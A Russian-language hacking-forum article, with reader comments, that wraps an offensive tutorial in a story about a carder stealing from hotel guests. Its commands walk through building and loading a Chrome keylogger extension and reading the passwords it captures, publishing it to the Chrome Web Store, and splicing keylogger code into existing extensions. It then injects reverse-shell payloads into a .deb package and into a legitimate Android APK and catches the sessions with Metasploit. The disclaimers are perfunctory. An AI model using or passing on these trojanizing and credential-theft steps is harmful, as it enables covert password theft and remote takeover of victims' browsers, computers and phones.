• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Вездесущее сказание о Github: они уже в твоей голове

Холод. Приглушенные звуки автострады, взор затуманен, размыт. Нечёткие мелкие фигурки, снующие в полумраке, под мостом: белые капюшоны, мантия, дающая слабый отблеск и так рецессивного света – всё поглощающая темень, тянущая мгновение, словно мальченок жевательную резинку, спокойствие, а фигурки всё кружатся быстрее и быстрее, непреодолимое желание уснуть.

Резко в поле взгляда попадает здоровяк , он прямо над тобой, медленно и уверенно заносит топор, дабы рубануть от души, делает это, как в сотни раз других, растягивая момент – удовольствие. Ты не можешь ничего сделать, лишь бегать глазками в поисках помощи – не сдвинуться. Здоровяк медленно опускает орудие, целясь тебе прямо в грудь, немыслимый ужас, сердце колотит, проламывая рёбра, на наружу выворачивая их, страх смерти, немыслимый, парализующий деймос … Рассвет, постель, одиночество, утро – всего лишь сон… Очередной сон.

Тяжесть в конечностях, ломота, головокружение, попытки дотронуться к лицу заканчивались пронзительной болью. Преодолевая себя, прилагая сверхчеловеческие усилия, Девин скачивается с постели на пол, пронзительный вопль и звук удара об пол смешиваются в симфоническую канонаду глухого и избавленного таланта директора музыкальной школы, страдающего психическими расстройствами. Стон, болезненный и долгий, очередная таблетка – спокойствие, блаженство, умиротворение.

Спустя несколько мгновений, теперь бодрый, мужчина , в возрасте около тридцати лет , подрывается с пола и направляется к выходу со своего номера, открыв дверь, во взор падает ему шагающий паренек: одет в серые джинсы, чёрный кофтан, кепка и наушники, через плече висит сумка для ноутбука. В спешке парень не обратил никакого внимания на человека, стоявшего у двери, а с кармана, быстро проходящего человечка, выпал стеклянный шарик. Выкотиться ему предстояло именно на перекрест путей Девина – глухой звук падения, удар – темнота.

Майкл даже не услышал этого, стараясь покинуть скорее здания и будучи в поднесенном к небесам настроении , ибо только что свершилась его мечта, он смог заработать на новую квартиру, обворовав несколько доверчивых особей в отеле, путем подмены точки доступа.

Заглавие

Приветствую, особо нет вариантов и идей , как теперь правильно начать первую строчку именно статьи , а не подводки, потому ограничимся таким вот выпадом приветствия вида. Как заметить вам удалось, статья уже концептуально иная, хотя будем беседовать о вещах приземлённых , но неординарно и в своей специфической манере изложения.

Собственно, знакомьтесь – это Майкл: типичный студент-иностранец , который проходит обучение в политехническом ВУЗе на втором курсе, специальность значения особого не играет, но важно определить себе ключи его психотипа - он любит всякие хацкерские примочки и штучки, потому постоянно носит с собой ноутбук. Основным его заработком есть кардинг, но он также увлечен в другие сферы чёрного пентеста, заядлый шутник и тролль, обладающий не последним интеллектом на дне современного общества.

А теперь к плану:
  • Да приклонимся пред Царицей Богов: расширение-кейлогер для Chrome
  • Визуал, как тип искусства: мобильно, практично, удобно
  • Сказание о вездесущей полезной нагрузке: они уже в твоей голове
Добравшись домой, Майкл начинает парсить Github на предмет наличия интересного и нового, а этим и займёмся вместе с ним мы.

Берегись

Первым счётом, обращу ваше внимание на надобность шапочки с фольги во время прочтения этого псевдошедевра. А делом ровным если, то я разочарован, ибо сколько бы я не предупреждал, не снимал с себя ответственность и не говорил, что не стоит использовать всё представленное в целях плохих – напрасно. Самые умные поймут и дойдут к выводам интуитивно, без моего словоблудия, а кто нет - растолкую в комментариях, больше нет слов – едем.

Да приклонимся пред Царицей Богов: расширение-кейлогер для Chrome

Разобравшись более детально в образе нашего главного героя, можно смекнуть, что для него есть очень важными следующие критерии во время его «пыльной работёнки»: простота, надёжность, относительная гарантия анонимности и безотказность. Даже осознавая всю опасность и возможное наказание, Майкл предпочитает действовать не так скрытно, как эффективно, потому всячески старается применить навыки игры в драматическом кружке, то бишь социальную инженерию.

Этого рода инструмент во взор Майки очень давно вошёл, словно соринка, превратившаяся в бревно торчащее с глаза. Прочитав описание данного скрипта наш персонаж приходит к выводам, что это обыкновенный кейлогер, который встраивается в браузер и выдаёт нам результат желанный для наживы – пароли. Потому без промедлений Майки копирует этот репозиторий с гитхаб следующей командой:

Код:
git clone https://github.com/UndeadSec/HeraKeylogger.git

Затем переходит в директорию и устанавливает зависимости с помощью pip3 и запускает Геру в действие:

Код:
cd HeraKeylogger
sudo apt-get install python3-pip -y
sudo pip3 install -r requirements.txt
python3 hera.py

Поговаривают, что жена Зевса была очень и очень капризной, славно, что данный скрипт эта участь обошла, надеюсь, это не сделало его менее величественным.

Снимок экрана_2020-07-20_17-36-09.png


После есть всё предельно простым – Майкл вводит айпи адрес свой, делает описание расширения и активирует PHP cлушатель. Следующим шагом нам стоит убедиться, что наше дополнение к браузеру действительно было скомпилировано: переходим в папочку с репозиторием, где отыскиваем следующий каталог, открыв его мы должны лицезреть три файла.

Дальше нам понадобится сам браузер для тестов, так как я работаю с под Kali, как и наш главный герой, придётся его установить, ибо дефолтно он отсутствует. Команды даю без особых разъяснений, поверьте на слово, что это работает:

Код:
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
apt install gdebi-core
gdebi google-chrome-stable_current_amd64.deb
google-chrome --no-sandbox

Cледом открываем наш, уже установленный, хром и переходим во вкладку «дополнительно», а уже оттуда в «Расширения», но изначально мы увидим только стандартный список и никаких функций подгрузки чего-то своего, потому включаем режим разработчика, а это делается в левом верхнем углу, и довольствуемся прелестью возможностей.

Заметив вкладочку «Компиляция» , Майкл слегка задумался, но оставить решил на потом, нажимая на «Загрузить распакованное расширение», вслед за этим переходим в директорию с Герой и выбираем именно папку (Папку, да, не файлик, а целую папку), где был локализирован готовый кейлогер и тыкаем «Загрузить». Далее наблюдаем красивую картину с установленным расширением, но именно Майкл на этом не остановится – это дотошный и педантичный мальчишка, который никогда не останавливается не изучив вплоть и до конца, именно из-за этого он переходит на какой-то сайт и проходит авторизацию, спустя мгновение шагает в папку с репозиторием и открывает файл «logs.txt», где уже со спокойной душей видит пароль.

Снимок экрана_2020-07-20_17-37-24.png


Но даже теперь ему мало и он хочет попытаться сжать расширение посредством функции браузера и попытаться отправить его в магазин хром, что и делает. Первым делом сжимает его, выбрав пункт «Сжать расширение», получив в итоге два файлика - ключ и собственно сам плагин. Затем ступает в раздел магазина «Developer Dashboard» и вносит одноразовую плату в 5 долларов за создания аккаунта разработчика, после успешно выгружает своё творение, то бишь дитё Геры, во свет.

А что если попытаться взять какое-то расширение, что уже имеется в сторе и вставить в исходный код его кейлогер? Для этого скачиваем любое, после распаковываем с помощью обычного архиватора, перейдя в папку видим несколько файлов, что отвечают за Javascript. А я ведь не кодер, как и Майкл ,потому вставляем код кейлогера везде в конец. После подгружаем в хром – пау, а логи приходят.

Снимок экрана_2020-07-20_17-43-17.png


Мини-выводы

Как видите, к сожалению, перед таким даже самые топовые браузеры беззащитны, что достаточно странно, но самые большие разочарования, провалы, и дыры имеют вещи, обретавшие репутацию на протяжении веков. Со способов защиты ничего посоветовать не могу, разве вручную просматривать код и анализировать его составляющее на предмет вредоносных элементов.

Визуал, как тип искусства: мобильно, практично, удобно

И да, о подомном мы вели беседу в прошлой статье, но здесь дела обстоят иначе в корне, ибо прошлый скрипт, допустим Калимукс, создавал под себя отдельную файловую систему, внутри выделенного места под эмулятор при операциях с которой получал доступ суперпользователя, хотя концепт у них схож, это всё же кардинально разные приспособления, к делу непосредственно.

Для нашего Майки огромнейшим счёт нужны не столь умения, как портативность и чувство, когда нужно остановиться – меры датчик именно. Изначально нам было ведомо, что наш юный, но уже не зеленый хацкер, пользуется обычным ноутбуком с Кали, такой параметр был подобающим, но ведь если углубиться в психологию масс, то парень с ноутбуком привлекает больше внимания и вызывает более высокое количество подозрений, чем мальчишка с телефоном. К сути, то не всем ведомо, что с телефонов можно творить ужасти.

Screenshot_20200721-135625.jpeg


Не всегда представляется удобным помнить , что и какой командой нужно активировать, а GUI на базе самого термукса – дело другое. Потому наш Майки быстренько устанавливает весь нужный хлам для полноценной работы одной командой:

Код:
pkg update && pkg upgrade && pkg install x11-repo && pkg install tigervnc openbox obconf xorg-xsetroot xcompmgr xterm polybar st libnl zsh geany pcmanfm rofi feh neofetch htop vim elinks mutt git wget curl xfce4-settings

Следующим чередом стоит установить сам репозиторий, а после установки перейти в его папку, где скопировать файлы «Home» & «usr» и перенести их в корневую папку эмулятора термукс, но это удобней сделать командой, ибо возиться с файлами – это не комильфо для нашего студентика:

Код:
cd $HOME && git clone https://github.com/adi1090x/termux-desktop
mv -f ./home /data/data/com.termux/files && mv -f ./usr /data/data/com.termux/files

А теперь стоит настроить саму визуализацию, посредством старого-доброго VNC. Для начала запустим его и укажем пароль для подключения:

Код:
vncserver -localhost
export DISPLAY=":1"

Screenshot_20200721-135730.jpeg


Следующим шагом стоит выбрать интерфейс рабочего стола, а затем и перезапустить сессию и включить заново:

Код:
vncserver
vncserver -kill :1

А теперь переходим в VNCClient и указываем айпи локального хоста с портом 5901. Пау-пау.

Screenshot_20200721-135952.jpeg


Стоит сказать, что всё основано на одном и том же принципе, но имеет некоторые отличия в корне, этот вариант более простой и ,возможно даже, надёжней.

Сказание о вездесущей полезной нагрузке: они уже в твоей голове

Так, как среда деятельности Майкла ограничена примитивностью и безотказностью, потому давайте рассмотрим способ подобающий роду занятий. Речь пойдёт о простой, как двери, полезной нагрузке, интегрированной в различные файлы. Такая вещица в умелых руках может приносить неплохой профит, если есть голова на плечах, как у нашего героя. (Здесь не спутайте, мы рассматриваем скрипты, я не призываю использовать это в целях фарма денег).

Снимок экрана_2020-07-20_18-41-12.png


Майки очень заинтересовал тот факт, что ходит стереотип о том, что на платформы Линукс нет вирусов, а слегка подумав, то можно провести аналогию: если нет вирусов, то нет и средств защиты от них. Наш студентик очень заинтересовался файлом с расширением .deb, когда устанавливал Хром на свою машину, а что если интегрировать полезную нагрузку в него? Кажись никто не будет ожидать ,что в таком файлике могут быть какие-то зловреды, тем более это ведь линукс.

Хотя практического применения сыскать будет трудно, но ситуации разные бывают, для этого воспользуемся репозиторием под названием debinject, скопировав его:

Код:
git clone https://github.com/UndeadSec/Debinject.git

Переходим в корневую папку с ним, куда вставляем заранее подготовленный файл с расширением .deb, после запускаем сам скрипт:

Код:
cd Debinject
python debinject.py

Указываем название скопированного файла, указываем наш порт и адрес, а после выбираем архитектуру. Майклу больше по душе реверс TPC, потому он кликает именно на него, следующим делом соглашается со всем и вся , следом может лицезреть картину запущенного слушателя.

Снимок экрана_2020-07-20_18-58-07.png


Здесь я специально указал свой внешний адрес, дабы провести полноценный тест с вирутальной машиной на базе линукс. А именно AWS EC2 Ubuntu 20.4. Кое-как допёр, что нужно просто перетащить файл в окошко SSH клиента, а затем провёл аналогичные действия, как и с установщиком хрома, то есть банально установил – вуаля, открылась новая сессия.

А теперь давайте словим ностальгическую капельку ушедших годов, когда-то давно я писал статью о полезных нагрузках, где мы создавали APK файл с ним, пустой файл да, подписывали его и тестировали на различных машинах. А давайте-ка усовершенствуем этот метод, как раз и Майклу нравится, ибо сейчас все пользуются мобильными приложениями от банков, даже автор.

Специально для этого отрыл достаточно забавный скрипт, который вносит полезную нагрузку уже в существующий APK, а после интеграции и подписывает , указывая всю нужную информацию.

Существует отличительный нюанс, установку нужно проводить в следующей директории:

Код:
cd /opt/

Затем проводим установку самого скрипта и побочных, что тоже будут нужны в ходе компиляции и подписи:

Код:
git clone https://github.com/Technowlogy-Pushpender/apkinfector.git
cd apkinfector
apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner
python3 infector.py --help

Снимок экрана_2020-07-21_10-09-42.png


Теперь со спокойной совестью вставляем следующую команду, изменив название конечного файла и исходного , указав его путь:

Код:
python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Затем будет уйма всякой всячины , с которой нужно будет соглашаться и прописывать информацию, а в конце предстоит выбрать и приложение, которым будем производить подпись, ну, это предельно просто и смысла расписывать нет.

После завершения последней операции с подписью нам нужно перейти в корневую папку репозитория, где будет валяться наш готовый APK, вроде в папке «Final», пишу по памяти и не помню, но там будет указана директория аутпута, потому не беда.

Переходим непосредственно к тестам, для этого возьмём простенький девайс на Андроид 6.0, скидываем на него наш вирусный APK и проводим установку. Незначительным минусом может быть количество запрашиваемых разрешений, но это скрыть никак нельзя, правда обычно люди на это не смотрят.

Снимок экрана_2020-07-21_10-18-45.png


После установки на телефоне ничего не изменилось, появилась игрушка, которая была выбрана в качестве оболочки, но ведь мы не запустили слушатель..

Да, моя оплошность, делается это с помощью метасплоита, в корневой папке будет файл с расширением .rb, который будет открыт через VIM, просто запускаете msfconsole и вставляете все команды – слушатель запущен. А теперь проводим повторную установку и можем лицезреть открытую сессию.

Теперь затронем тему интеграции полезной нагрузки в картинку, а почему бы и нет, след…

Сделав последний глоток с чашки и с трудом оторвав глаза от экрана, Вадим плавно прикрыл телефон подушкой, прежде занеся статью в закладки, чтобы дочитать с утра. Дабы не разбудить никого со спящих, бархатом уложился на подушку . Чай был на исходе и продолжать чтение смысла не имело, тянуло посетить Морфея , отведав его утехи по пути…

(Продолжение следует…)
 

Mogen

Red Team
27.08.2019
314
612
BIT
8
Как будто нереально качественную и увлекательную книгу читать начал.(y)
Уровень написания статьи просто супер!

Спасибо за статью. С нетерпением буду ждать продолжение. У меня есть вопрос, планируется ли экранизация? ))
stephanie887,с вами согласен. Крутой сериал или фильм получиться.

Спасибо вам за статью DeathDay.
 

DeathDay

Green Team
18.04.2019
150
1 099
BIT
27
Вот и продолжение подоспело!
А за зловреда под Linux отдельное спасибо
Формально это новая история от лица чтения Вадима, продолжение его истории будет позже .
 
Последнее редактирование:
  • Нравится
Реакции: henry057 и Knotoni

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
22
Интересный эксперимент со стилем изложения. Неплохо. Но есть ньюанс. Не сильно увлекайся прозой и чуть по больше конкретики, что происходит в статье. А то мне пришлось пол страницы текста прочитать, прежде чем я понял о чем речь.
 

DeathDay

Green Team
18.04.2019
150
1 099
BIT
27
Интересный эксперимент со стилем изложения. Неплохо. Но есть ньюанс. Не сильно увлекайся прозой и чуть по больше конкретики, что происходит в статье. А то мне пришлось пол страницы текста прочитать, прежде чем я понял о чем речь.
В подсчет на оплату подводка не шла, потому не волнуйтесь. Водой не ограбить.
 

DeathDay

Green Team
18.04.2019
150
1 099
BIT
27
Я на счет оплаты ничего не знаю. Я оцениваю только с точки зрения читателя.
Всяко такого ещё не делали, потому судить сложно. Возможна ли конкретика и поэтические изложения сувокупно? Дабы пропускающий сквозь мозг свой мог ориентироваться и читать что-то явственно - существует план и разделы. :) В будущем буду помечать необязательность прочтения поэтики.
 

henry057

Green Team
02.03.2020
189
18
BIT
0
1595833033283.png

Поверил, не работает, как запустить все это дело?
 

stratmor

One Level
26.07.2020
4
3
BIT
0
Блестящий пример техника-гуманитария (таких нужно в Красную книгу)! Спасибо Вам и за информацию между строк и за стиль подачи! (Жду продолжения).
 
  • Нравится
Реакции: DeathDay
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!